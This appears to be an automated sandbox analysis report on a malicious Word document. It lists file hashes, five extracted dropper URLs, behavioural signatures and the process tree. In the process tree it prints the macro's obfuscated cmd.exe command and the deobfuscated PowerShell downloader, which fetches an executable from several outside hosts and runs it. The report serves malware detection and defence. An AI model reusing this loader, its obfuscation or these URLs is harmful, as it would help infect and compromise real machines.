Analysis

  • max time kernel
    55s
  • max time network
    36s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    22-11-2024 02:22

General

  • Target

    22a9879ed2647f7a2d634c2bce52bd183e8c0fd9073477758afe3080ed2f83a8.doc

  • Size

    105KB

  • MD5

    ed8ef17ea6d7cf17d582cf27c0026b01

  • SHA1

    8a876c8c80f607347d11d07e262b8c59396ef115

  • SHA256

    22a9879ed2647f7a2d634c2bce52bd183e8c0fd9073477758afe3080ed2f83a8

  • SHA512

    01c454eebf9246c987db12455a68bd72c6208197b1b1511afa9888f2dc5467f4153e12c8ba41de33a32f8cbf2d38b38a8c2491bd5d05a5ae48fa91d06b4ccd57

  • SSDEEP

    1536:fuwocn1kp59gxBK85fBU8NGo67Di7lSbKexUtrxBk7PvwVIvbVJXKDiFayL:g41k/W48+8NGoGD0loKexMjIVJaDiFa

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://liarla.com/RqAjQLJlx

exe.dropper

http://espasat.com/1YbH45y

exe.dropper

http://latuconference.com/wp-content/uploads/vvl9XHG

exe.dropper

http://dirtyactionsports.com/vVgr4dva

exe.dropper

http://demign.com/PGT53cb

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\22a9879ed2647f7a2d634c2bce52bd183e8c0fd9073477758afe3080ed2f83a8.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1852
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2340
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c %pROGraMdATa:~0,1%%ProGrAmDAtA:~9,2% /v:ON/C"SeT 0Kj=poZ^%PUy6PLIC:~5,1^%r^%7E77IONN6ME:~-(,1^%h^%TEMP:~-3,1^%ll $etailersf=Jobac#grou]d`Jo;$c[a]R=]eZ-ob}ect Net.WebClie]t;$I]credible}=Johttp://liarla.com/R`6}QLJlx@http://espasat.com/1Ybk(5[@http://latuco]fere]ce.com/Zp-co]te]t/uploads/vvl9XkG@http://dirt[actio]sports.com/vVgr(dva@http://demig].com/PGT53cbJo.7plit?Jo@Jo);$Tast[7oftComputerP=JovioletWJo;$CreditCard6ccou]tG = Jo(08Jo;$Woode]p=Jorevolutio]i2eOJo;$6vo]u=$e]v:public+Jo\Jo+$CreditCard6ccou]tG+Jo.exeJo;foreach?$Lice]sedt i] $I]credible}){tr[{$c[a]R.DoZ]loadqpile?$Lice]sedt, $6vo]u);$programmi]gy6P=JomodelsTJo;If ??Get-Item $6vo]u).le]gth -ge 80000) {I]vo#e-Item $6vo]u;$y6Proo#s2=JoProactive7Jo;brea#;__catch{__$y6Per#shireQ=JoorchestratehJo;&& seT R2W=!0Kj:(=4!&& sEt IOl=!R2W:Jo='!&& sET 1f=!IOl:?=(!&set kKg=!1f:qp=F!& SET WK=!kKg:y6P=B!& SeT JtU=!WK:]=n!& SET p6=!JtU:k=H!& set 5ql=!p6:#=k!&& SET aR=!5ql:6=A!&& seT Ay=!aR:}=j!& SEt UNIF=!Ay:_=}!& SeT fmBy=!UNIF:`=q!& sET 8ps=!fmBy:[=y!&& set kMJ4=!8ps:7=S!& SeT ImBE=!kMJ4:Z=w!&& SET le=!ImBE:2=z!&&EChO %le% | cmD.ExE "
        2⤵
        • Process spawned unexpected child process
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2752
        • C:\Windows\SysWOW64\cmd.exe
          CmD /v:ON/C"SeT 0Kj=poZ^%PUy6PLIC:~5,1^%r^%7E77IONN6ME:~-(,1^%h^%TEMP:~-3,1^%ll $etailersf=Jobac#grou]d`Jo;$c[a]R=]eZ-ob}ect Net.WebClie]t;$I]credible}=Johttp://liarla.com/R`6}QLJlx@http://espasat.com/1Ybk(5[@http://latuco]fere]ce.com/Zp-co]te]t/uploads/vvl9XkG@http://dirt[actio]sports.com/vVgr(dva@http://demig].com/PGT53cbJo.7plit?Jo@Jo);$Tast[7oftComputerP=JovioletWJo;$CreditCard6ccou]tG = Jo(08Jo;$Woode]p=Jorevolutio]i2eOJo;$6vo]u=$e]v:public+Jo\Jo+$CreditCard6ccou]tG+Jo.exeJo;foreach?$Lice]sedt i] $I]credible}){tr[{$c[a]R.DoZ]loadqpile?$Lice]sedt, $6vo]u);$programmi]gy6P=JomodelsTJo;If ??Get-Item $6vo]u).le]gth -ge 80000) {I]vo#e-Item $6vo]u;$y6Proo#s2=JoProactive7Jo;brea#;__catch{__$y6Per#shireQ=JoorchestratehJo;&& seT R2W=!0Kj:(=4!&& sEt IOl=!R2W:Jo='!&& sET 1f=!IOl:?=(!&set kKg=!1f:qp=F!& SET WK=!kKg:y6P=B!& SeT JtU=!WK:]=n!& SET p6=!JtU:k=H!& set 5ql=!p6:#=k!&& SET aR=!5ql:6=A!&& seT Ay=!aR:}=j!& SEt UNIF=!Ay:_=}!& SeT fmBy=!UNIF:`=q!& sET 8ps=!fmBy:[=y!&& set kMJ4=!8ps:7=S!& SeT ImBE=!kMJ4:Z=w!&& SET le=!ImBE:2=z!&&EChO %le% | cmD.ExE "
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2864
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" EChO %le% "
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2764
          • C:\Windows\SysWOW64\cmd.exe
            cmD.ExE
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2644
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell $etailersf='backgroundq';$cyanR=new-object Net.WebClient;$Incrediblej='http://liarla.com/RqAjQLJlx@http://espasat.com/1YbH45y@http://latuconference.com/wp-content/uploads/vvl9XHG@http://dirtyactionsports.com/vVgr4dva@http://demign.com/PGT53cb'.Split('@');$TastySoftComputerP='violetW';$CreditCardAccountG = '408';$Woodenp='revolutionizeO';$Avonu=$env:public+'\'+$CreditCardAccountG+'.exe';foreach($Licensedt in $Incrediblej){try{$cyanR.DownloadFile($Licensedt, $Avonu);$programmingB='modelsT';If ((Get-Item $Avonu).length -ge 80000) {Invoke-Item $Avonu;$Brooksz='ProactiveS';break;}}catch{}}$BerkshireQ='orchestrateh';
              5⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2692

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C4F0C1A2.wmf

      Filesize

      494B

      MD5

      41459361dafd679bc31e5e2271983c11

      SHA1

      5423216bd3e431a60327e30e6c59e0ffcd47e6b4

      SHA256

      06e889eac8e0ca37060aa62db6e071c13fcc74b478464aa3eb6fc73c96bf8176

      SHA512

      7c66cfe6869a90103aae88fd4095a939846998cc59ffed973693925452c88b3bceeec46de6b4500bef7d2749525a82f42e61cad02091693a5dcec84bbcd9d762

    • memory/1852-26-0x00000000003E0000-0x00000000004E0000-memory.dmp

      Filesize

      1024KB

    • memory/1852-25-0x00000000003E0000-0x00000000004E0000-memory.dmp

      Filesize

      1024KB

    • memory/1852-6-0x0000000005AD0000-0x0000000005BD0000-memory.dmp

      Filesize

      1024KB

    • memory/1852-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1852-20-0x00000000003E0000-0x00000000004E0000-memory.dmp

      Filesize

      1024KB

    • memory/1852-22-0x00000000003E0000-0x00000000004E0000-memory.dmp

      Filesize

      1024KB

    • memory/1852-2-0x00000000739DD000-0x00000000739E8000-memory.dmp

      Filesize

      44KB

    • memory/1852-0-0x000000002FB51000-0x000000002FB52000-memory.dmp

      Filesize

      4KB

    • memory/1852-27-0x0000000005CC0000-0x0000000005DC0000-memory.dmp

      Filesize

      1024KB

    • memory/1852-23-0x00000000003E0000-0x00000000004E0000-memory.dmp

      Filesize

      1024KB

    • memory/1852-21-0x00000000003E0000-0x00000000004E0000-memory.dmp

      Filesize

      1024KB

    • memory/1852-32-0x00000000739DD000-0x00000000739E8000-memory.dmp

      Filesize

      44KB

    • memory/1852-33-0x0000000005AD0000-0x0000000005BD0000-memory.dmp

      Filesize

      1024KB

    • memory/1852-34-0x00000000003E0000-0x00000000004E0000-memory.dmp

      Filesize

      1024KB

    • memory/1852-35-0x0000000005CC0000-0x0000000005DC0000-memory.dmp

      Filesize

      1024KB